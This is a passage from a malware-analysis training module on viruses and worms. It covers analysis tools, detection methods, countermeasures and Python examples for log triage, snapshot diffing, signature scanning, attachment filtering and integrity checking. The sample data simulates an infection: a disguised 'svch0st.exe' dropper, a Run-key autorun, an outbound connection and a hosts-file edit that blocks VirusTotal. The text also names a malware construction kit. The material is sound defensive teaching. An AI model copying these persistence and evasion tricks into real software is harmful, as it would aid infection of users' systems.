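SAMPLE_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"12:13:46.620","Explorer.EXE","2384","CreateFileMapping","C:\Windows\System32\imageres.dll","SUCCESS","SyncType: SyncTypeCreateSection"
"12:13:47.101","setup.exe","4412","CreateFile","C:\Users\Administrator\AppData\Local\Temp\svch0st.exe","SUCCESS","Desired Access: Generic Write"
"12:13:47.102","setup.exe","4412","WriteFile","C:\Users\Administrator\AppData\Local\Temp\svch0st.exe","SUCCESS","Offset: 0, Length: 65,536"
"12:13:47.150","setup.exe","4412","RegSetValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater","SUCCESS","Type: REG_SZ, Data: C:\Users\Administrator\AppData\Local\Temp\svch0st.exe"
"12:13:47.200","setup.exe","4412","Process Create","C:\Users\Administrator\AppData\Local\Temp\svch0st.exe","SUCCESS","PID: 4500, Command line: svch0st.exe"
"12:13:47.300","svch0st.exe","4500","TCP Connect","WIN-MSSELCK4K41:1056 -> 203.0.113.7:8080","SUCCESS","Length: 0, mss: 1460"
"12:13:47.400","mmc.exe","4100","ReadFile","C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll","SUCCESS","Offset: 7,623,168, Length: 4,096"
'''

# Registry autorun locations and the directories malware usually drops into.
AUTORUN_KEYS = re.compile(r'\\CurrentVersion\\(Run|RunOnce)\\', re.IGNORECASE)
DROP_DIRS = re.compile(r'\\(AppData\\Local\\Temp|Windows\\Temp|Windows\\System32)\\', re.IGNORECASE)
NETWORK_OPS = {'TCP Connect', 'TCP Send', 'TCP Receive', 'UDP Send', 'UDP Receive'}


def triage(csv_text):
    """Return (category, process, pid, path) findings in event order."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        op, path, detail = row['Operation'], row['Path'], row['Detail']
        who = (row['Process Name'], row['PID'])
        if op == 'RegSetValue' and AUTORUN_KEYS.search(path):
            findings.append(('persistence', *who, path))
        elif DROP_DIRS.search(path) and (op == 'WriteFile'
                                         or (op == 'CreateFile' and 'Write' in detail)):
            findings.append(('file_drop', *who, path))        # reads of system DLLs are ignored
        elif op == 'Process Create':
            findings.append(('child_process', *who, path))
        elif op in NETWORK_OPS:
            findings.append(('network', *who, path))
    return findings


def summarize(findings):
    """Count findings per (process, pid); processes with nothing flagged do not appear."""
    per_process = defaultdict(lambda: defaultdict(int))
    for category, proc, pid, _path in findings:
        per_process[(proc, pid)][category] += 1
    return {k: dict(v) for k, v in per_process.items()}


if __name__ == '__main__':
    found = triage(SAMPLE_CSV)
    for finding in found:
        print(finding)
    print(summarize(found))
```

The rules are deliberately narrow: a write into a drop directory, a value under a Run key, a child process and an outbound connection are each ordinary on their own, but the summary makes it obvious when one process (here setup.exe and the svch0st.exe it spawned) does all four within a second. Extend DROP_DIRS and AUTORUN_KEYS with the other locations you care about (Startup folders, Services, Winlogon) rather than loosening the operation match, or Explorer's own file activity will flood the output.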
Malware Analysis Procedure (Cont'd)

Step 5: Record network traffic information using connectivity and packet-content logging tools such as NetResident and TCPView.
Step 6: Determine the files added, processes spawned, and changes to the registry with the help of registry monitoring tools such as RegShot.

NetResident

Source: http://www.tamos.com

NetResident is a network content analysis application designed to monitor, store, and reconstruct a wide range of network events and activities, such as email messages, web pages, downloaded files, instant messages, and VoIP conversations. It uses advanced monitoring technology to capture the data on the network, saves the data to a database, reconstructs it, and displays the content.

[Screenshot: NetResident (evaluation version) event list dated 10/5/2012 with the columns Protocol, Party A, Port A, Party B, Port B and Last Updated, listing Web events from host WIN-LXQN3... on client ports 1076 to 1205 to mystart-... on port 80 and to maa03s04-in... on ports 80 and 443. The detail pane for the selected event shows a POST request to http://news.google.co.in/news/xhr/rhc?authuser=0 with a "cid" tag whose value is a dot-separated list of numeric identifiers.]
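RegShot works by taking a snapshot of the registry (and optionally of chosen directories) before the sample runs, a second one afterwards, and reporting what was added, removed or modified. The following is an added example that implements that comparison; it is not RegShot's code. It hashes every file under a directory tree, diffs two such snapshots, and applies the same diff to a registry subtree walked with the standard winreg module (that function only works on Windows and is not exercised by the demo). The demo builds a throw-away directory tree standing in for a clean system, simulates a dropped executable, an edited hosts file and a deleted log, and returns the diff; every path in it is constructed for the example.

```python
"""Added example: RegShot-style before/after comparison (step 6). The directory tree built
by demo() is a constructed stand-in for a system; every path in it is made up."""
import hashlib
import os
import tempfile


def snapshot_tree(root):
    """Map each file below root (POSIX-style relative path) to its SHA-256, like RegShot's file scan."""
    snap = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, 'rb') as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            snap[os.path.relpath(full, root).replace(os.sep, '/')] = digest
    return snap


def snapshot_registry(hive, subkey):
    """Map every value below a registry subtree to repr(data). Windows only (winreg)."""
    import winreg  # assumption: running on Windows; this function is not run by demo()
    snap = {}

    def walk(key, path):
        i = 0
        while True:                       # values of this key
            try:
                name, data, _kind = winreg.EnumValue(key, i)
            except OSError:
                break
            snap[path + '\\' + name] = repr(data)
            i += 1
        i = 0
        while True:                       # then recurse into subkeys
            try:
                child = winreg.EnumKey(key, i)
            except OSError:
                break
            with winreg.OpenKey(key, child) as sub:
                walk(sub, path + '\\' + child)
            i += 1

    with winreg.OpenKey(hive, subkey) as key:
        walk(key, subkey)
    return snap


def diff_snapshots(before, after):
    """The comparison RegShot makes: entries added, removed, or whose data changed."""
    return {
        'added': sorted(k for k in after if k not in before),
        'removed': sorted(k for k in before if k not in after),
        'modified': sorted(k for k in before if k in after and before[k] != after[k]),
    }


def _write(root, rel, data):
    path = os.path.join(root, *rel.split('/'))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, 'wb') as fh:
        fh.write(data)


def demo():
    """Snapshot a constructed 'clean' tree, simulate a sample's side effects, snapshot again."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, 'Windows/System32/hosts', b'127.0.0.1 localhost\n')
        _write(root, 'Windows/System32/imageres.dll', b'\x00' * 64)
        _write(root, 'Users/Admin/AppData/Local/Temp/setup.log', b'ok\n')
        before = snapshot_tree(root)
        # what the sample did while it ran: dropped a binary, edited hosts, removed its log
        _write(root, 'Users/Admin/AppData/Local/Temp/svch0st.exe', b'MZ' + b'\x90' * 30)
        _write(root, 'Windows/System32/hosts',
               b'127.0.0.1 localhost\n127.0.0.1 www.virustotal.com\n')
        os.remove(os.path.join(root, 'Users', 'Admin', 'AppData', 'Local', 'Temp', 'setup.log'))
        after = snapshot_tree(root)
        return diff_snapshots(before, after)


if __name__ == '__main__':
    for kind, paths in demo().items():
        print(kind, paths)
```

On a real testbed the two tree snapshots bracket the run of the sample (take the first right after reverting to the clean snapshot, the second after the sample has finished), and the registry snapshot is taken of HKLM\SOFTWARE and HKCU\Software the same way. Hashing contents rather than comparing timestamps is what catches an edited hosts file or a patched system DLL whose size and name did not change.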
Malware Analysis Procedure (Cont'd)

Step 7: Collect the following information using debugging tools such as OllyDbg and ProcDump:

- Service requests
- Attempts at incoming and outgoing connections
- DNS table information

OllyDbg

Source: http://www.ollydbg.de

OllyDbg is a 32-bit assembler-level analyzing debugger for Microsoft Windows. Its emphasis on binary code analysis makes it particularly useful in cases where the source is unavailable.

[Screenshot: OllyDbg with the CPU disassembly pane (calls to KERNEL32.GetProcessHeap and KERNEL32.HeapAlloc and PUSH/CALL/RETN sequences around 0040109A), the register pane (ECX 00000000, ESP 0018FF88, segment registers in 32-bit mode, last error ERROR_MOD_NOT_FOUND (0000007E), EFL 00000244) and the stack pane showing a RETURN to 0018FF0C.]
Virus Analysis Tool: IDA Pro

Source: http://www.hex-rays.com

IDA Pro is a disassembler and debugger that supports both Windows and Linux platforms.

Disassembler

The disassembler displays the instructions a program executes in symbolic form, even when only the binary form of the code is available; it presents the processor's execution flow as maps. This lets users identify viruses as well. For example, if a screensaver or a "gif" file is trying to spy on the user's internal applications, IDA Pro reveals this immediately. IDA Pro uses up-to-date techniques to trace difficult binary code, which it displays as readable execution maps.

Debugger

The debugger is an interactive tool that complements the disassembler's static analysis by letting the analyst step through the code as it runs. This gets past obfuscation and helps the analyst examine hostile code in depth.

IDA Pro is a tool for exploring software vulnerabilities and evaluating tamper resistance. It is an interactive, programmable, multi-processor disassembler coupled to a local and remote debugger and augmented by a complete plugin programming environment. It is used by antivirus companies, research companies, software development companies, agencies, and military organizations.

[Screenshot: IDA Pro Demo 6.3 with C:\Program Files (x86)\IDA Demo 6.3\qwingraph.exe loaded. The Functions window lists sub_401070 through sub_403B30 (line 2 of 944); the IDA View-A pane shows a function prologue that calls GetCommandLineW and then QString::fromWCharArray and QString::toLocal8Bit; the Output window reports that ida.idc and onload.idc were compiled, that IDA is analysing the input file, and that the FLIRT signature "Microsoft VisualC 2-10/net runtime" was applied.]
VirusTotal is a free service that analyzes suspicious files and URLs and facilitates the detection of viruses, worms, Trojans, etc.
[Screenshot: VirusTotal analysis report for an uploaded file, identified by its SHA256 hash, with detections from engines such as Avast and AVG naming the MoSucker backdoor (Backdoor.Win32.MoSucker).]
VirusTotal is a service that analyzes suspicious files and facilitates the quick detection of viruses, worms, Trojans, and all kinds of malware detected by antivirus engines. Features:
- Free and independent service
- Uses multiple antivirus engines
- Comprised of real-time automatic updates of virus signatures
- Gives detailed results from each antivirus engine
- Has real-time global statistics
Online Malware Analysis Services
Online malware analysis services allow you to scan files and resources and secure them before attackers can use them to compromise your systems. A few online malware analysis services are listed as follows:
- Anubis: Analyzing Unknown Binaries, available at http://anubis.iseclab.org
- Avast! Online Scanner, available at http://onlinescan.avast.com
- Malware Protection Center, available at https://www.microsoft.com
- ThreatExpert, available at http://www.threatexpert.com
- Dr. Web Online Scanners, available at http://vms.drweb.com
- Metascan Online, available at http://www.metascan-online.com
- Bitdefender QuickScan, available at http://www.bitdefender.com
- GFI SandBox, available at http://www.gfi.com
- UploadMalware.com, available at http://www.uploadmalware.com
- Fortinet, available at http://www.fortiguard.com
Module Flow
So far, we have discussed various viruses and worms and malware analysis. Now we will discuss the countermeasures to be applied to protect against viruses and worms, if any are found. These countermeasures help in enhancing security.
Module flow: Types of Viruses, Computer Worms, Malware Analysis, Countermeasures, Penetration Testing.
Virus Detection Methods
- Scanning: once a virus has been detected, it is possible to write scanning programs that look for the signature string characteristics of the virus.
- Integrity checking: integrity checking products work by reading the entire disk and recording integrity data that acts as a signature for the files and system sectors.
- Interception: the interceptor monitors the operating system requests that are written to the disk.

A virus scanner is an important piece of software that one should have installed on the PC. Without a scanner there is a high chance that the system will be hit by and suffer from a virus. A virus protector should be run regularly on the PC, and the scan engine and virus signature database have to be updated often. Antivirus software is of no use if it does not know what to look for in the latest virus. One should always remember that an antivirus program cannot stop everything. The rule of thumb is that if an email looks suspicious, e.g., if one is not expecting an email from the sender, does not know the sender, or the header looks like something a known sender would not normally say, one must be careful about opening it, as there is a risk of becoming infected by a virus. The MyDoom and W32.Novarg.A@mm worms recently infected many Internet users, most of them through email. The three best methods for antivirus detection are:
- Scanning
- Integrity checking
- Interception
In addition, a combination of some of these techniques can be more effective.
Scanning
The moment a virus is detected in the wild, antivirus vendors across the globe start writing scanning programs that look for its signature strings (characteristic of the virus). The strings are identified and extracted from the virus by these scanner writers. The resulting new scanners search memory, files, and system sectors for the signature strings of the new virus. The scanner declares the presence of a virus once it finds a match. Only known and pre-defined viruses can be detected.
Virus writers often create many new viruses by altering an existing one. What looks like a new virus may have taken just a few minutes to create. Attackers make these changes frequently to throw off the scanners. In addition to signature recognition, new scanners make use of various other detection techniques such as code analysis. Before looking into the code characteristics of a virus, the scanner examines the code at various locations in an executable file. Alternatively, the scanner sets up a virtual computer in RAM and tests programs by executing them in the virtual space. This technique, called "heuristic scanning," can also check and remove messages that might contain a computer virus or other unwanted content.
The major advantages of scanners are:
- They can check programs before they are executed.
- It is the easiest way to check new software for any known or malicious virus.
The major drawbacks to scanners are:
- Old scanners can prove to be unreliable. With the tremendous increase in new viruses, old scanners can quickly become obsolete. It is best to use the latest scanners available on the market.
- Even a new scanner is never equipped to handle all new challenges, since viruses appear more rapidly than new scanners can be developed to battle them.
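To make the signature-scanning idea concrete, here is an added example, not code from the EC-Council module or from any antivirus vendor, of a minimal byte-signature scanner in Python. The signatures, sample buffers and names such as Example.MaskedCall are constructed for illustration and are not real malware patterns. It also shows why scanners wildcard the bytes that vary between samples: a fixed-string signature misses a variant that changes a single byte, while a masked pattern still matches.

```python
"""Minimal byte-signature scanner with wildcard support (constructed example)."""
from typing import List, Optional, Sequence, Tuple

# A pattern is a list of byte values; None is a wildcard that matches any byte.
Pattern = Sequence[Optional[int]]


def parse_signature(text: str) -> List[Optional[int]]:
    """Parse a hex pattern such as 'E8 ?? ?? ?? ?? 5D' into bytes and wildcards."""
    return [None if tok == "??" else int(tok, 16) for tok in text.split()]


# Constructed signatures for this example; they are not real malware patterns.
SIGNATURES: List[Tuple[str, List[Optional[int]]]] = [
    # A plain string signature: every byte must match exactly.
    ("Example.FixedString", list(b"CONSTRUCTED-TEST-MARKER")),
    # A masked signature: the four displacement bytes after a CALL opcode (E8)
    # differ between variants, so they are wildcarded; the surrounding bytes are not.
    ("Example.MaskedCall", parse_signature("E8 ?? ?? ?? ?? 5D 81 ED")),
]


def match_at(data: bytes, offset: int, pattern: Pattern) -> bool:
    """True if pattern matches data starting at offset (wildcards match anything)."""
    if offset + len(pattern) > len(data):
        return False
    return all(b is None or data[offset + i] == b for i, b in enumerate(pattern))


def scan_bytes(data: bytes, signatures=SIGNATURES) -> List[Tuple[str, int]]:
    """Return (signature name, offset) for each signature found in data."""
    hits: List[Tuple[str, int]] = []
    for name, pattern in signatures:
        first = pattern[0]
        for off in range(len(data) - len(pattern) + 1):
            # Cheap first-byte check before the full compare (skipped for a leading wildcard).
            if first is not None and data[off] != first:
                continue
            if match_at(data, off, pattern):
                hits.append((name, off))
                break  # one hit is enough to flag the buffer for this signature
    return hits


def scan_file(path: str, signatures=SIGNATURES) -> List[Tuple[str, int]]:
    """Scan a whole file; real scanners also walk memory and system sectors."""
    with open(path, "rb") as fh:
        return scan_bytes(fh.read(), signatures)


def variant_demo() -> dict:
    """Constructed buffers showing how a one-byte change affects each signature type."""
    fixed = b"\x00" * 16 + b"CONSTRUCTED-TEST-MARKER" + b"\x00" * 8
    fixed_variant = fixed.replace(b"MARKER", b"MARKEX")  # one byte altered
    masked = b"\x90\x90" + bytes([0xE8, 0x11, 0x22, 0x33, 0x44, 0x5D, 0x81, 0xED])
    masked_variant = b"\x90\x90" + bytes([0xE8, 0xAA, 0xBB, 0xCC, 0xDD, 0x5D, 0x81, 0xED])
    return {
        "fixed": scan_bytes(fixed),                  # hit at offset 16
        "fixed_variant": scan_bytes(fixed_variant),  # missed: exact string no longer present
        "masked": scan_bytes(masked),                # hit at offset 2
        "masked_variant": scan_bytes(masked_variant),  # still hit: changed bytes are wildcarded
    }


if __name__ == "__main__":
    for label, result in variant_demo().items():
        print(f"{label:15s} -> {result or 'clean'}")
```

The first-byte pre-check is the kind of shortcut production engines take much further (multi-pattern automata, hashing of fixed prefixes); the point here is only that detection is limited to what the signature database already describes, which is exactly the "only known and pre-defined viruses" limitation the text names.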
Integrity Checking
Integrity checking products perform their functions by reading and recording integrity data to develop a signature or baseline for the files and system sectors. Integrity products check any program with built-in intelligence. This is really the only solution that can take care of all the threats to data. The most trusted way to know the amount of damage done by a virus is provided by these integrity checkers, since they can check data against the originally established baseline.
A disadvantage of a basic integrity checker is that it cannot differentiate file corruption caused by a bug from corruption caused by a virus.
However, there are some advanced integrity checkers available that are capable of analyzing and identifying the types of changes that viruses make. A few integrity checkers combine some of the antivirus techniques with integrity checking to create a hybrid. This also simplifies the virus checking process.
Interception
The main use of an interceptor is for deflecting logic bombs and Trojans. The interceptor controls requests to the operating system for network access or actions that cause a threat to the program. If it finds such a request, the interceptor generally pops up and asks if the user wants to allow the request to continue. There are no dependable ways to intercept direct branches to low-level code or direct input and output instructions issued by the virus. In some cases, the virus is capable of disabling the monitoring program itself. Some years back it took only eight bytes of code for a widely used antivirus program to turn off its monitoring functions.
Virus and Worms Countermeasures
Preventive measures need to be followed in order to lessen the possibility of virus infections and data loss. If certain rules and actions are adhered to, the possibility of falling victim to a virus can be minimized. Some of these methods include:
- Install antivirus software that detects and removes infections as they appear
- Generate an antivirus policy for safe computing and distribute it to the staff
- Pay attention to the instructions while downloading files or any programs from the Internet
- Update the antivirus software on a monthly basis, so that it can identify and clean out new bugs
- Avoid opening attachments received from an unknown sender, as viruses spread via email attachments
- Since a virus infection may corrupt data, regularly maintain data backups
- Schedule regular scans for all drives after the installation of antivirus software
- Do not accept disks or programs without checking them first using a current version of an antivirus program
Virus and Worms Countermeasures (Cont'd)
- Ensure the executable code sent to the organization is approved
- Run disk cleanup, registry scanner, and defragmentation once a week
- Do not boot the machine with an infected bootable system disk
- Turn on the firewall if the OS used is Windows XP
- Keep informed about the latest virus threats
- Run anti-spyware or anti-adware scans once a week
- Check DVDs and CDs for virus infection
- Block files with more than one file type extension
- Ensure the pop-up blocker is turned on and use an Internet firewall
- Be cautious with files being sent through instant messengers
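The rule about files with more than one file type extension is easy to automate at a mail gateway. The following is an added example in Python, not part of the module and not any vendor's filter, that classifies attachment names by their extension chain. The extension sets, the filenames and the allow/review/block verdicts are this example's own constructed policy. It treats a legitimate compound archive extension such as .tar.gz as benign and collapses whitespace so that padded names are judged on their real final extension.

```python
"""Classify e-mail attachment names by their extension chain (constructed example)."""
import re
from typing import List

# Extensions Windows treats as directly executable (representative subset, assumed).
EXECUTABLE_EXTENSIONS = {
    "exe", "scr", "pif", "com", "bat", "cmd", "vbs", "vbe", "js", "jse",
    "wsf", "wsh", "hta", "msi", "cpl", "ps1",
}
# Common document, image and archive types (representative subset, assumed).
DATA_EXTENSIONS = {
    "pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "rtf",
    "jpg", "jpeg", "png", "gif", "zip", "rar", "7z", "tar", "gz", "bz2", "xz",
}
KNOWN_EXTENSIONS = EXECUTABLE_EXTENSIONS | DATA_EXTENSIONS
# Compound extensions that legitimately carry two file types.
ALLOWED_COMPOUND = {"tar.gz", "tar.bz2", "tar.xz"}


def extensions_of(filename: str) -> List[str]:
    """Lower-cased extension chain of a name, e.g. 'a.pdf.exe' -> ['pdf', 'exe']."""
    name = re.sub(r"\s+", "", filename.strip().lower())  # drop padding whitespace
    parts = [p for p in name.split(".") if p]             # ignore empty segments (trailing dots)
    return parts[1:] if len(parts) > 1 else []


def attachment_verdict(filename: str) -> str:
    """Policy used in this example:
    'block'  - an executable hidden behind another known file type (invoice.pdf.exe)
    'review' - a bare executable (needs approval) or two stacked non-executable types
    'allow'  - everything else, including allowed compound archives (backup.tar.gz)
    """
    exts = extensions_of(filename)
    if not exts:
        return "allow"
    last = exts[-1]
    if len(exts) >= 2:
        prev = exts[-2]
        if f"{prev}.{last}" in ALLOWED_COMPOUND:
            return "allow"
        if prev in KNOWN_EXTENSIONS and last in KNOWN_EXTENSIONS:
            return "block" if last in EXECUTABLE_EXTENSIONS else "review"
    return "review" if last in EXECUTABLE_EXTENSIONS else "allow"


if __name__ == "__main__":
    # Constructed sample names for a quick demonstration.
    for name in ["invoice.pdf.exe", "photo.jpg      .scr", "backup.tar.gz",
                 "report.q3.pdf", "notes.txt.pdf", "setup.exe", "README"]:
        print(f"{name!r:25} -> {attachment_verdict(name)}")
```

Only the last two segments decide the verdict, so version-like middles such as report.q3.pdf are not penalised; if your policy wants every stacked known type flagged, walk the whole chain instead of the final pair.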
Companion Antivirus: Immunet
Source: http://www.immunet.com
[Screenshot: Immunet console showing the community count (2,478,268 people protected), a completed scan summary with files scanned, threats detected and threats removed, the scan history, and an upgrade offer for Immunet Plus 3.0 with advanced rootkit removal and offline protection.]
Companion Antivirus means that Immunet is compatible with existing antivirus solutions. Immunet adds an extra, lightweight layer of protection for greater peace of mind. Since traditional antivirus solutions detect on average only 50% of online threats, most users are under-protected, which is why every PC can benefit from Immunet's essential layer of security. Immunet Protect's detection power relies on ETHOS and SPERO, the heuristics-based engine and the cloud engine. Users of the Plus version also benefit from a third engine called TETRA, which provides protection when not connected to the Internet.
Antivirus Tools
Antivirus tools prevent, detect, and remove viruses and other malicious code from your system. These tools protect your system and repair viruses in all incoming and outgoing email messages and instant messenger attachments. In addition, these tools monitor the network's traffic for malicious activities. A few antivirus tools that can be used for detecting and killing viruses on systems are listed as follows:
- AVG Antivirus, available at http://free.avg.com
- BitDefender, available at http://www.bitdefender.com
- Kaspersky Anti-Virus, available at http://www.kaspersky.com
- Trend Micro Internet Security Pro, available at http://apac.trendmicro.com
- Norton AntiVirus, available at http://www.symantec.com
- F-Secure Anti-Virus, available at http://www.f-secure.com
- Avast Pro Antivirus, available at http://www.avast.com
- McAfee AntiVirus Plus 2013, available at http://home.mcafee.com
- ESET Smart Security 5, available at http://www.eset.com
- Total Defense Internet Security Suite, available at http://www.totaldefense.com
Module Flow
Module flow: Types of Viruses, Computer Worms, Malware Analysis, Countermeasures, Penetration Testing.
Penetration testing must be conducted against viruses and worms, as they are the most widely used means of attack and do not require extensive knowledge to use. Hence, you should conduct pen testing on your system or network before a real attacker exploits it. This section provides insight into virus and worm pen testing.
Penetration Testing for Viruses
Step 1: Install an antivirus program on the network infrastructure and on the end-user's system.
Step 2: Update the antivirus software so that its virus database includes the newly identified viruses.
Step 3: Scan the system for viruses, which helps to repair damage or delete files infected with viruses.
Step 4: Set the antivirus to quarantine or delete the virus. Set your antivirus software to compare file contents with the known computer virus signatures, identify infected files, quarantine and repair them if possible, or delete them if not.
Step 5: Go to safe mode and delete the infected file manually. If the virus is not removed, then go to safe mode and delete the infected file manually.
Decision point: is the virus removed? If so, the system is safe.
Penetration Testing for Viruses (Cont'd)
Step 6: Scan the system for running processes. You should scan your system for suspicious running processes. You can do this by using tools such as What's Running, HijackThis, etc. If any suspicious process, registry entry, startup program, or service is discovered, check the associated executable files.
Step 7: Scan the system for suspicious registry entries. You should scan your system for suspicious registry entries. You can do this by using tools such as JV Power Tools and RegShot.
Step 8: Scan the system for Windows services. You should scan for suspicious Windows services running on your system. You can do this by using tools such as SrvMan and ServiWin.
Step 9: Scan the system for startup programs. You should scan your system for suspicious startup programs. Tools such as Starter, Security AutoRun, and Autoruns can be used to scan the startup programs. Determine whether all the programs in the list can be recognized as having known functionality.
Step 10: Scan the system for file and folder integrity. You should scan your system for file and folder integrity. You can do this by using tools such as FCIV, TRIPWIRE, and SIGVERIF. Check the data files for modification or manipulation by opening several files and comparing their hash values with a pre-computed hash.
Penetration Testing for Viruses (Cont'd)
Step 11: Scan the system for critical OS modifications. You can check critical OS files for modification or manipulation using tools such as TRIPWIRE, or by manually comparing hash values if you have a backup copy.
Step 12: Document all findings. Documenting all your findings from the previous steps helps in determining the next action if viruses are identified on the system.
Step 13: Isolate the infected system. Once an infected system is identified, isolate it from the network immediately in order to prevent further infection.
Step 14: Sanitize the complete infected system. Remove virus infections from your system by using the latest updated antivirus software.
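The integrity-checking detection method described earlier and Steps 10 and 11 above come down to the same operation: record a baseline of file hashes, then compare the current state of the system against it. The following is an added example in Python, not code from the module and not FCIV or TRIPWIRE, of that baseline-and-compare loop. The directory layout, file contents and the tampering performed in demo_report() are constructed for illustration, and the function names (build_baseline, compare_baseline, demo_report) are this example's own.

```python
"""Hash-baseline integrity check: record SHA-256 digests, then diff (constructed example)."""
import hashlib
import json
import os
import tempfile
from typing import Dict, List


def sha256_file(path: str, chunk_size: int = 1 << 16) -> str:
    """Stream a file through SHA-256 so large binaries need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def build_baseline(root: str) -> Dict[str, str]:
    """Map every file under root (path relative to root, '/'-separated) to its digest."""
    baseline: Dict[str, str] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = sha256_file(full)
    return baseline


def save_baseline(baseline: Dict[str, str], path: str) -> None:
    # Keep the baseline outside the monitored tree (ideally on read-only media):
    # a virus that can rewrite files can otherwise rewrite the baseline as well.
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(baseline, fh, indent=2, sort_keys=True)


def load_baseline(path: str) -> Dict[str, str]:
    with open(path, "r", encoding="utf-8") as fh:
        return json.load(fh)


def compare_baseline(baseline: Dict[str, str], root: str) -> Dict[str, List[str]]:
    """Report files added, removed or modified since the baseline was recorded."""
    current = build_baseline(root)
    known, seen = set(baseline), set(current)
    return {
        "added": sorted(seen - known),
        "removed": sorted(known - seen),
        "modified": sorted(p for p in known & seen if current[p] != baseline[p]),
    }


def _write(root: str, rel: str, data: bytes) -> None:
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "wb") as fh:
        fh.write(data)


def demo_report(tamper: bool = True) -> Dict[str, List[str]]:
    """Build a constructed tree, baseline it, optionally tamper with it, return the diff."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "bin/app.exe", b"MZ-constructed-original-program")
        _write(root, "etc/config.ini", b"[scan]\nmode=full\n")
        _write(root, "docs/readme.txt", b"constructed readme\n")
        baseline = build_baseline(root)
        if tamper:
            # Constructed changes mimicking an infection: the executable grows
            # (appended code), a new file appears, and an existing file disappears.
            with open(os.path.join(root, "bin", "app.exe"), "ab") as fh:
                fh.write(b"<constructed appended bytes>")
            _write(root, "bin/helper.dll", b"constructed new file")
            os.remove(os.path.join(root, "docs", "readme.txt"))
        return compare_baseline(baseline, root)


if __name__ == "__main__":
    print(json.dumps(demo_report(), indent=2))
```

As the text notes, a hash diff alone cannot tell a virus-caused change from a legitimate update or a bug, so the report is a list of files to investigate, not a verdict; pairing it with a signature scan of the modified files is the hybrid approach the Integrity Checking section mentions.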
Module Summary
A virus is a self-replicating program that produces its own code by attaching copies of itself to other executable code, whereas worms are malicious programs that replicate, execute, and spread across network connections independently, without human interaction. Some viruses affect computers as soon as their code is executed; other viruses lie dormant until a pre-determined logical circumstance is met. Viruses are categorized according to the files they infect and the way they work. The lifecycle of viruses and worms includes the designing, replication, launching, detection, incorporation, and elimination stages. A computer gets infected by viruses, worms, and other malware due to not running the latest antivirus application, not updating and installing new versions of plug-ins, installing pirated software, opening infected email attachments, or downloading files without properly checking the source. Several virus and worm development kits, such as JPS Virus Maker, are available in the wild and can be used to create malware without any technical knowledge. Virus detection methods include system scanning, file integrity checking, and monitoring OS requests. Virus and worm countermeasures include installing antivirus software and following antivirus policies for safe computing.
Module 07 Page 1110